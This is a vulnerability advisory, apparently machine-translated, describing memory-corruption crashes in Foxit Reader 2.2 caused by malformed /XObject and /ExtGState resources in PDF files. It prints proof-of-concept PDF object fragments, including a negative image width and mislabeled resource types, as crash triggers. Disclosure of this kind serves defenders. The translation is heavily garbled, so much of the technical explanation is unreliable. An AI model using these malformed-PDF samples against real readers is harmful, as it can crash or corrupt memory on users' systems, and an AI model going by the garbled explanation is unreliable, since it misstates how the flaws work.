Is affected the system:
Foxit Foxit Reader 2.2
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28890
Foxit Reader is a section of small PDF documents examination and the print. program.
Foxit the Reader processing contains has when the abnormal /XObject resources homepage has the crack, the user when processes the malicious document will cause Foxit the Reader collapse.
When used Foxit the Reader revolving contained has the abnormal /XObject resources homepage (or to page increased the /Rotate field):
4 0 obj
<< /Type /Page
/Parent 3 0 R
/Rotate 170
/Contents [25 0 R]
/Resources <<
/ProcSet [/PDF /Text /ImageB /ImageC]
/XObject <</Im23 23 0 R>>/Font << /TT3 33 0 R >>>>
>>
endobj
23 0 obj
<</Length 11643/Filter/DCTDecode/Width -28986631481/Height 5/BitsPerComponent 8/ColorSpace/DeviceRGB/Type/#6eject/Name/ #4825#6#25n#00°#6e#6en#25n#72 ƒ É #25n™ #r3/Subtype/Image>>
stream
........................
endstream
endobj
If revised the width and highly the field, Foxit invalid will write visit to each kind of memory address execution.
When the analysis abnormal /ExtGState resources also has the memory destruction crack. In this case used the /Font resources to replace the ExtGState resources, but the resources type was still ExtGState:
261 0 obj
<</Type /Page /Parent 126 0 R /MediaBox [0 0 259 408] /CropBox [0 0 531 666] /Resources <</ProcSet [/PDF /Text] /ExtGState <</R7 7 0 R>>>> /Contents [20 0 R] >>
endobj
7 0 obj
<</FirstChaaa 1
/Type /Funt /FontDescriptor 23 0 R
/BaseFont /xxxxxxxxxxxxxxxxoman, Italic
/Subtype /TrueType
/Encoding /WinAnsiEncoding
/LaitChar 211
/Wodths [ ]
>>
endobj
23 0 obj
<</zzz9ð E /oooooo >>
endobj
Some functions analyze any resources type any field, when therefore under the /ExtGState resources has the /Font field, still will read and explains these fields, causes structure which fills with the wrong data assigns.
<* origin: Javier Vicente Vallejo
Link: http://www.vallejo.cc/proyectos/foxitreader1.htm
http://www.vallejo.cc/proyectos/foxitreader2.htm
http://secunia.com/advisories/29934/
*>
Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:
Foxit
-----
At present the manufacturer has not provided the patch or the promotion procedure, we suggested that uses this software's user momentarily to pay attention to the manufacturer the main page to gain the newest edition:
http://www.foxitsoftware.com/pdf/rd_intro.php
|